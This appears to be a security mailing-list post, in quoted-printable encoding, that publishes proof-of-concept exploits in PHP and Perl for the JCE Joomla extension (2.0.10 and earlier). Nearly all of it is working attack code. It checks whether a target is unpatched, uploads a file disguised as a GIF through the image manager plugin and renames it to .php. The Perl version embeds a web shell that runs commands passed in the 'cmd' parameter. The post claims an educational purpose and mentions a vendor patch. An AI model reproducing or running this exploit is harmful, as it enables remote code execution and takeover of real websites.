Related POC for JCE Joomla Extension <=2.0.10 Multiple
After release of vendor supplied patch for JCE's vulnerabilities, =20
AmnPardaz is going to submit related POC for this issue in Perl and =20
PHP after one month for educational purposes.
PHP Version:
<?php
######################################### www.bugreport.ir =20
########################################
#
# AmnPardaz Security Research & Penetration Testing Grou=
p
#
#
# Title: Exploit for JCE Joomla Extension (Auto Shell =20
Uploader) V0.1 - PHP Version
# Vendor: http://www.joomlacontenteditor.net
# Vulnerable Version: JCE 2.0.10 (prior versions also may be affected)
# Exploitation: Remote with browser
# Original Advisory: http://www.bugreport.ir/index_78.htm
# Vendor supplied patch: =20
http://www.joomlacontenteditor.net/news/item/jce-2011-released
# CVSS2 Base Score: (AV:N/AC:L/Au:N/C:P/I:P/A:P) --> 7.5
# Coded By: Mostafa Azizi
############################################################################=
#######################
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
echo'<html>
<head>
<title>JCE Joomla Extension Remote File Upload</title>
</head>
<body bgcolor=3D"#00000">
<p align=3D"center"><font size=3D"4" color=3D"#00ff00">JCE Joomla Extension =
=20
Remote File Upload</font></p>
</font>
<table width=3D"90%">
<tbody>
<tr>
<td width=3D"43%" align=3D"left">
<form name=3D"form1" action=3D"'.$SERVER[PHP_SELF].'" =20
enctype=3D"multipart/form-data" method=3D"post">
<p></font><font color=3D"#00ff00" > hostname =20
(ex:www.sitename.com): </font><input name=3D"host" size=3D"20"> <span =20
class=3D"Stile5"><font color=3D"#FF0000">*</span></p>
<p></font><font color=3D"#00ff00" > path (ex: /joomla/ or =20
just / ): </font><input name=3D"path" size=3D"20"> <span =20
class=3D"Stile5"><font color=3D"#FF0000">*</span></p>
=09=09 <p></font><font color=3D"#00ff00" >Please specify a file to upload: =
=20
</font><input type=3D"file" name=3D"datafile" size=3D"40"><font =
=20
color=3D"#FF0000"> * </font>
<p><font color=3D"#00ff00" > specify a port (default is 80): =20
</font><input name=3D"port" size=3D"20"><span =20
class=3D"Stile5"></span></p>
<p><font color=3D"#00ff00" > Proxy (ip:port): =20
</font><input name=3D"proxy" size=3D"20"><span =20
class=3D"Stile5"></span></p>
<p align=3D"center"> <span class=3D"Stile5"><font =20
color=3D"#FF0000">* </font><font color=3D"white" >fields are =20
required</font></font></span></p>
<p><input type=3D"submit" value=3D"Start" name=3D"Submit"></p>
</form>
</td>
</tr>
</tbody>
</table>
</body></html>';
function sendpacket($packet,$response =3D 0,$output =3D 0,$s=3D0)
{
=09$proxy_regex =3D '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
=09global $proxy, $host, $port, $html, $user, $pass;
=09if ($proxy =3D=3D '')
=09{
=09=09$ock =3D fsockopen($host,$port);
=09=09stream_set_timeout($ock, 5);
=09=09if (!$ock)
=09=09{
=09=09=09echo '<font color=3Dwhite> No response from '.htmlentities($host).'=
=20
....<br></font>';
=09=09=09die;
=09=09}
=09} else
=09{
=09=09$parts =3D explode(':',$proxy);
=09=09echo '<font color=3Dwhite>Connecting to proxy: =20
'.$parts[0].':'.$parts[1].' ...<br><br/></font>';
=09=09$ock =3D fsockopen($parts[0],$parts[1]);
=09=09stream_set_timeout($ock, 5);
=09=09if (!$ock)
=09=09{
=09=09=09echo '<font color=3Dwhite>No response from proxy...<br></font>';
=09=09=09die;
=09=09}
=09}
=09=09fputs($ock,$packet);
=09=09if ($response =3D=3D 1)
=09=09{
=09=09=09if ($proxy =3D=3D '')
=09=09=09{
=09=09=09=09$html =3D '';
=09=09=09=09while (!feof($ock))
=09=09=09=09{
=09=09=09=09=09$html .=3D fgets($ock);
=09=09=09=09}
=09=09=09} else
=09=09=09{
=09=09=09=09$html =3D '';
=09=09=09=09while ((!feof($ock)) or =20
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
=09=09=09=09{
=09=09=09=09=09$html .=3D fread($ock,1);
=09=09=09=09}
=09=09=09}
=09=09} else $html =3D '';
=09=09fclose($ock);
=09=09if ($response =3D=3D 1 && $output =3D=3D 1) echo nl2br(htmlentities($h=
tml));
=09=09if ($s=3D=3D1){
=09=09$count=3D0;
=09=09$res=3Dnl2br(htmlentities($html));
=09=09$str =3D =20
array('2.0.11</title','2.0.12</title','2.0.13</title','2.0.14</titl=
e','2.0.15</title','1.5.7.10</title','1.5.7.11</title','1.5.7.12<=
;/title','1.5.7.13</title','1.5.7.14</title');
=09=09foreach ($str as $value){
=09=09$pos =3D strpos($res, $value);
=09=09if ($pos =3D=3D=3D false) {
=09=09$count=3D$count++;
=09=09} else {
=09=09echo "<font color=3Dwhite>Target patched.<br/><br/></font>";
=09=09die();
=09=09}
=09=09}
=09=09if ($count=3D10) echo '<font color=3Dwhite>Target is =20
exploitable.<br/><br/></font>';
=09=09}
}
$host =3D $_POST['host'];
$path =3D $_POST['path'];
$port =3D $_POST['port'];
$proxy =3D $_POST['proxy'];
if (isset($_POST['Submit']) && $host !=3D '' && $path !=3D '')
{
$port=3Dintval(trim($port));
if ($port=3D=3D'') {$port=3D80;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {die('<font =20
color=3Dwhite>Error... check the path!</font>');}
if ($proxy=3D=3D'') {$p=3D$path;} else {$p=3D'http://'.$host.':'.$port.$p=
ath;}
$host=3Dstr_replace("\r\n","",$host);
$path=3Dstr_replace("\r\n","",$path);
=09=09 =09=09=09=09=09=09=09=09=09/* Packet 1 --> Checking Exploitabil=
ity */
=09=09=09$packet =3D "GET =20
".$p."/index.php?option=3Dcom_jce&task=3Dplugin&plugin=3Dimgmanager&file=3Di=
mgmanager&version=3D1576&cid=3D20 =20
HTTP/1.1\r\n";
=09=09=09$packet .=3D "Host: ".$host."\r\n";
=09=09=09$packet .=3D "User-Agent: BOT/0.1 (BOT for JCE) \r\n\r\n\r\n\r\n";
=09=09=09sendpacket($packet,1,0,1);
=09=09=09=09=09=09=09=09=09/* Packet 2 --> Uploading shell as a gif fil=
e */
=09=09=09$content =3D "GIF89a1\n";
=09=09=09$content .=3D file_get_contents($_FILES['datafile']['tmp_name']);
=09=09=09$data =3D "-----------------------------41184676334\r\n";
=09=09=09$data .=3D "Content-Disposition: form-data; name=3D\"upload-dir\"=
\r\n\r\n";
=09=09=09$data .=3D "/\r\n";
=09=09=09$data .=3D "-----------------------------41184676334\r\n";
=09=09=09$data .=3D "Content-Disposition: form-data; name=3D\"Filedata\"; =
=20
filename=3D\"\"\r\n";
=09=09=09$data .=3D "Content-Type: application/octet-stream\r\n\r\n\r\n";
=09=09=09$data .=3D "-----------------------------41184676334\r\n";
=09=09=09$data .=3D "Content-Disposition: form-data; =20
name=3D\"upload-overwrite\"\r\n\r\n";
=09=09=09$data .=3D "0\r\n";
=09=09=09$data .=3D "-----------------------------41184676334\r\n";
=09=09=09$data .=3D "Content-Disposition: form-data; name=3D\"Filedata\"; =
=20
filename=3D\"0day.gif\"\r\n";
=09=09=09$data .=3D "Content-Type: image/gif\r\n\r\n";
=09=09=09$data .=3D "$content\r\n";
=09=09=09$data .=3D "-----------------------------41184676334\r\n";
=09=09=09$data .=3D "0day\r\n";
=09=09=09$data .=3D "-----------------------------41184676334\r\n";
=09=09=09$data .=3D "Content-Disposition: form-data; name=3D\"action\"\r\n=
\r\n";
=09=09=09$data .=3D "upload\r\n";
=09=09=09$data .=3D "-----------------------------41184676334--\r\n\r\n\r\=
n\r\n";
=09=09=09$packet =3D "POST =20
".$p."/index.php?option=3Dcom_jce&task=3Dplugin&plugin=3Dimgmanager&file=3Di=
mgmanager&method=3Dform&cid=3D20&6bc427c8a7981f4fe1f5ac65c1246b5f=3D9d09f693=
c63c1988a9f8a564e0da7743 =20
HTTP/1.1\r\n";
=09=09=09$packet .=3D "Host: ".$host."\r\n";
=09=09=09$packet .=3D "User-Agent: BOT/0.1 (BOT for JCE)\r\n";
=09=09=09$packet .=3D "Content-Type: multipart/form-data; =20
boundary=3D---------------------------41184676334\r\n";
=09=09=09$packet .=3D "Accept-Language: en-us,en;q=3D0.5\r\n";
=09=09=09$packet .=3D "Accept-Charset: ISO-8859-1,utf-8;q=3D0.7,*;q=3D0.7\r\=
n";
=09=09=09$packet .=3D "Cookie: =20
6bc427c8a7981f4fe1f5ac65c1246b5f=3D9d09f693c63c1988a9f8a564e0da7743; =20
jce_imgmanager_dir=3D%2F; =20
__utma=3D216871948.2116932307.1317632284.1317632284.1317632284.1; =20
__utmb=3D216871948.1.10.1317632284; __utmc=3D216871948; =20
__utmz=3D216871948.1317632284.1.1.utmcsr=3D(direct)|utmccn=3D(direct)|utmcmd=
=3D(none)\r\n";
=09=09=09$packet .=3D "Connection: Close\r\n";
=09=09=09$packet .=3D "Proxy-Connection: close\r\n";
=09=09=09$packet .=3D "Content-Length: ".strlen($data)."\r\n\r\n\r\n\r\n";
=09=09=09$packet .=3D $data;
=09=09=09sendpacket($packet,0,0,0);
=09 =09=09=09=09=09=09=09=09=09/* Packet 3 --> Change Extension from .gif t=
o .php */
=09=09=09$packet =3D "POST =20
".$p."/index.php?option=3Dcom_jce&task=3Dplugin&plugin=3Dimgmanager&file=3Di=
mgmanager&version=3D1576&cid=3D20 =20
HTTP/1.1\r\n";
=09=09=09$packet .=3D "Host: ".$host."\r\n";
=09=09=09$packet .=3D "User-Agent: BOT/0.1 (BOT for JCE) \r\n";
=09=09=09$packet .=3D "Accept: =20
text/html,application/xhtml+xml,application/xml;q=3D0.9,*/*;q=3D0.8\r\n";
=09=09=09$packet .=3D "Accept-Language: en-US,en;q=3D0.8\r\n";
=09=09=09$packet .=3D "Accept-Charset: ISO-8859-1,utf-8;q=3D0.7,*;q=3D0.7\r\=
n";
=09=09=09$packet .=3D "Content-Type: application/x-www-form-urlencoded; =20
charset=3Dutf-8\r\n";
=09=09=09$packet .=3D "Accept-Encoding: deflate\n";
=09=09=09$packet .=3D "X-Request: JSON\r\n";
=09=09=09$packet .=3D "Cookie: =20
__utma=3D216871948.2116932307.1317632284.1317639575.1317734968.3; =20
__utmz=3D216871948.1317632284.1.1.utmcsr=3D(direct)|utmccn=3D(direct)|utmcmd=
=3D(none); =20
__utmb=3D216871948.20.10.1317734968; __utmc=3D216871948; =20
jce_imgmanager_dir=3D%2F; =20
6bc427c8a7981f4fe1f5ac65c1246b5f=3D7df6350d464a1bb4205f84603b9af182\r\n";
=09=09=09$ren =20
=3D"json=3D{\"fn\":\"folderRename\",\"args\":[\"/0day.gif\",\"0day.php\"]}";
=09=09=09$packet .=3D "Content-Length: ".strlen($ren)."\r\n\r\n";
=09=09=09$packet .=3D $ren."\r\n\r\n";
=09=09=09sendpacket($packet,1,0,0);
=09 =09=09=09=09=09=09=09=09=09/* Packet 4 --> Check for successfully uploa=
ded */
=09=09=09$packet =3D "Head ".$p."/images/stories/0day.php HTTP/1.1\r\n";
=09=09=09$packet .=3D "Host: ".$host."\r\n";
=09=09=09$packet .=3D "User-Agent: BOT/0.1 (BOT for JCE) \r\n\r\n\r\n\r\n";
=09=09=09sendpacket($packet,1,0,0);
if(stristr($html , '200 OK') !=3D true)
{echo "<font color=3Dwhite>Exploit Faild...</font>";} else echo =20
"<font color=3Dwhite>Exploit =20
Succeeded...<br>";" rel="nofollow">http://$host:$port$path"."/images/stories/0day.php</font>";
}
?>
Perl Version:
######################################### www.bugreport.ir =20
########################################
#
# AmnPardaz Security Research & Penetration Testing Grou=
p
#
#
# Title: Exploit for JCE Joomla Extension (Auto Shell =20
Uploader) V0.1 - PHP Version
# Vendor: http://www.joomlacontenteditor.net
# Vulnerable Version: JCE 2.0.10 (prior versions also may be affected)
# Exploitation: Remote with browser
# Original Advisory: http://www.bugreport.ir/index_78.htm
# Vendor supplied patch: =20
http://www.joomlacontenteditor.net/news/item/jce-2011-released
# CVSS2 Base Score: (AV:N/AC:L/Au:N/C:P/I:P/A:P) --> 7.5
# Coded By: Mostafa Azizi
############################################################################=
#######################
use IO::Socket;
use LWP::Simple;
system("cls");
if(!defined($ARGV[0])) {
print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell =20
Uploader) V0.1 .::.\n\n";
print "\t|||| Coded by: Mostafa Azizi (admin[@]0-Day[dot]net) =20
||||\n\n";
print "\t+--> Usage: perl $0 <host> <--+\n";
print "\t+--> Example: perl $0 localhost <--+\n\n";
exit; }
print "\n\n\t.::. Exploit for JCE Joomla Extension (Auto Shell =20
Uploader) V0.1 .::.\n\n";
print "\t|||| Coded by: Mostafa Azizi (admin[@]0-Day[dot]net) =20
||||\n\n";
$TARGET =3D $ARGV[0];
$PORT =3D "80";
$SCRIPT =3D =20
"/index.php?option=3Dcom_jce&task=3Dplugin&plugin=3Dimgmanager&file=3Dimgman=
ager&version=3D1576&cid=3D20";
$SHELL =3D "/images/stories/0day.php?cmd=3D";
$HTTP =3D "http://";
$header1G =3D "GET $SCRIPT HTTP/1.1";
$header1H =3D "HEAD /images/stories/0day.php HTTP/1.1";
$header1P =3D "POST =20
/index.php?option=3Dcom_jce&task=3Dplugin&plugin=3Dimgmanager&file=3Dimgmana=
ger&method=3Dform&cid=3D20&6bc427c8a7981f4fe1f5ac65c1246b5f=3Dcf6dd3cf1923c9=
50586d0dd595c8e20b =20
HTTP/1.1";
$header1P2 =3D "POST =20
/index.php?option=3Dcom_jce&task=3Dplugin&plugin=3Dimgmanager&file=3Dimgmana=
ger&version=3D1576&cid=3D20 =20
HTTP/1.1";
$header2 =3D "Host: $TARGET";
$header3 =3D "User-Agent: BOT/0.1 (BOT for JCE)";
$header4 =3D "Content-Type: multipart/form-data; =20
boundary=3D---------------------------41184676334";
$header5 =3D "Content-Length: 769";
$header6 =3D "-----------------------------41184676334";
$header7 =3D 'Content-Disposition: form-data; name=3D"upload-dir"';
$header8 =3D '/';
$header9 =3D 'Content-Disposition: form-data; name=3D"Filedata"; filename=3D=
""';
$header10 =3D 'Content-Type: application/octet-stream';
$header11 =3D 'Content-Disposition: form-data; name=3D"upload-overwrite"';
$header12 =3D "0";
$header13 =3D 'Content-Disposition: form-data; name=3D"Filedata"; =20
filename=3D"0day.gif"';
$header14 =3D 'Content-Type: image/gif';
$header15 =3D 'GIF89aG';
$header16 =3D "<? system(\$_GET['cmd']\);exit; ?>";
$header17 =3D 'Content-Disposition: form-data; name=3D"upload-name"';
$header18 =3D '0day';
$header19 =3D 'Content-Disposition: form-data; name=3D"action"';
$header20 =3D 'upload';
$header21 =3D "-----------------------------41184676334--";
$header22 =3D 'X-Request: JSON';
$header23 =3D 'Content-Type: application/x-www-form-urlencoded; charset=3Dut=
f-8';
$header25 =3D 'json=3D{"fn":"folderRename","args":["/0day.gif","0day.php"]}'=
;
$header24 =3D "Content-Length: ".length($header25)."";
############################################### Packet 1 --> Checking =20
Exploitability #########################################################
print "\n[*] Checking Exploitability ...\n\n";
sleep 2;
$pageURL=3D$TARGET.$SCRIPT;
$simplePage=3Dget($pageURL);
@arr =3D =20
("2.0.11</title","2.0.12</title","2.0.13</title","2.0.14</title","2.0.15<=
/title","1.5.7.10</title","1.5.7.11</title","1.5.7.12</title","1.5.7.13</tit=
le","1.5.7.14</title");
while (($count!=3D10) && ($die !=3D 1)) {
=09foreach $arr(@arr){
=09=09if ($simplePage =3D~ m/$arr/) {
=09=09=09print "\n[*] Target patched.\n\n";
=09=09=09$die =3D 1;
=09=09} else {
=09=09=09$count++;
=09=09=09=09}
=09=09}
=09}
if ($count=3D=3D5) {print "[*] Target is exploitable.\n\n"};
############################################### Packet 2 --> Uploading =20
shell as a gif file =20
#########################################################
$remote =3D IO::Socket::INET->new(Proto=3D>"tcp",PeerAddr=3D>"$TARGET" =20
,PeerPort=3D>"$PORT")
|| die "Can't connect to $TARGET";
print "[*] Trying to upload 0day.gif ...\n\n";
print $remote =20
"$header1P\n$header2\n$header3\n$header4\n$header5\n\n$header6\n$header7\n\n=
$header8\n$header6\n$header9\n$header10\n\n\n$header6\n$header11\n\n$header1=
2\n$header6\n$header13\n$header14\n\n$header15\n$header16\n$header6\n$header=
17\n\n$header18\n$header6\n$header19\n\n$header20\n$header21\n\n";
sleep 2;
############################################### Packet 3 --> Change =20
Extension from .gif to .php =20
#########################################################
print "[*] Trying to change extension from .gif to .php ...\n\n";
$remote =3D IO::Socket::INET->new(Proto=3D>"tcp",PeerAddr=3D>"$TARGET" =20
,PeerPort=3D>"$PORT")
|| die "Can't connect to $TARGET";
print $remote =20
"$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header2=
5\n\n";
############################################### Packet 4 --> Check for =20
successfully uploaded =20
#########################################################
$shellurl=3D$TARGET.$SHELL;
$output=3Dget($shellurl);
while ($output =3D <$remote> ) {
if ($output =3D~ /200 OK/) {
print "[+] 0day.php was successfully uploaded\n\n";
print "[+] Path:".$TARGET.$SHELL."id\n";
}}